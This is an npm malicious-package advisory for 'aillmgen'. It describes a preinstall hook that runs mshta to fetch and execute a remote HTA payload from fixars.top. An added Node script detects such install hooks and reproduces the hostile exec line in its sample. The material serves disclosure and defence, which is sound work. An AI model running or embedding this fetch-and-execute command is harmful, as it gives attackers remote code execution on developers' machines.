npm · Malicious package advisory
MAL-2026-5927
Malicious code in aillmgen (npm)
Details
---
## Source: amazon-inspector (5b303e830a204ad1ee237f0403a2844f5dce96fa3e3841392ce92d7f3f502341)
On `npm install`, the package's preinstall hook (preinstall.js) runs `exec('cmd /c "mshta http://fixars.top"')`, invoking the Windows mshta.exe binary to fetch and execute an HTA payload from http://fixars.top with the installer's privileges. mshta is a well-known living-off-the-land binary that executes arbitrary HTA/JScript/VBScript content directly from a remote URL, giving the operator of fixars.top remote code execution on any Windows machine that installs this package. The remote endpoint is plain HTTP and attacker-mutable, and the behavior is unrelated to the package's stated LLM-client purpose (the library code references an EasyLLMClient targeting api.easyllm.ai while the package itself is published under the unrelated name `aillmgen` with empty author and description metadata). The combination of install-time RCE, plaintext attacker-controlled fetch-and-execute, impersonation of an LLM-client utility, and placeholder publisher metadata is a supply-chain dropper.
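As an added, defender-side illustration (not code from the advisory or the package), the following Node script statically inspects an npm package's install-time lifecycle hooks and any local script they run for the indicators described above: an `mshta` invocation, a `cmd /c` wrapper, a `child_process` exec call and a plaintext `http://` URL. The `package.json` and `preinstall.js` contents below are constructed to mirror the described behaviour; hook names and indicator patterns are this example's own choices.

```javascript
// Added example (not part of the advisory): static check for npm install-time
// lifecycle hooks that hand a remote HTTP URL to mshta or a similar LOLBin.
// Input is the package.json text plus the contents of any local script the
// hooks reference. All sample data below is constructed for illustration.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Indicators drawn from the advisory's description of the dropper.
const INDICATORS = [
  { name: 'mshta', re: /\bmshta(\.exe)?\b/i },
  { name: 'cmd-wrapper', re: /\bcmd(\.exe)?\s+\/c\b/i },
  { name: 'child-process-exec', re: /\bexec(?:Sync)?\s*\(/ },
  { name: 'plaintext-http-url', re: /\bhttp:\/\/[^\s'"`)]+/i },
];

// Returns the local script a hook command like "node preinstall.js" runs, if any.
function referencedScript(command) {
  const m = /\bnode\s+([\w./-]+\.c?js)\b/.exec(command);
  return m ? m[1] : null;
}

function scanPackage(packageJsonText, files) {
  const pkg = JSON.parse(packageJsonText);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (!command) continue;
    const sources = [{ where: `scripts.${hook}`, text: command }];
    const file = referencedScript(command);
    if (file && files[file] !== undefined) sources.push({ where: file, text: files[file] });
    for (const { where, text } of sources) {
      for (const { name, re } of INDICATORS) {
        const m = re.exec(text);
        if (m) findings.push({ hook, where, indicator: name, match: m[0] });
      }
    }
  }
  // Empty author/description is not malicious by itself; the advisory lists it as a corroborating signal.
  const placeholderMetadata = !pkg.author && !pkg.description;
  return { findings, placeholderMetadata, suspicious: findings.some(f => f.indicator === 'mshta') };
}

// Constructed sample mirroring the preinstall behaviour the advisory describes.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: 'example-pkg', version: '0.0.0', scripts: { preinstall: 'node preinstall.js' },
});
const SAMPLE_FILES = {
  'preinstall.js': `const { exec } = require('child_process');\nexec('cmd /c "mshta http://fixars.top"');\n`,
};

console.log(JSON.stringify(scanPackage(SAMPLE_PACKAGE_JSON, SAMPLE_FILES), null, 2));
```

Run it against an unpacked tarball (`npm pack` then extract) before installing, since the hooks fire during `npm install` itself; a hit on `mshta` plus a plaintext URL in an install hook is reason to quarantine the package rather than install it.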
Compromised versions (1)
- 4.0.2
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.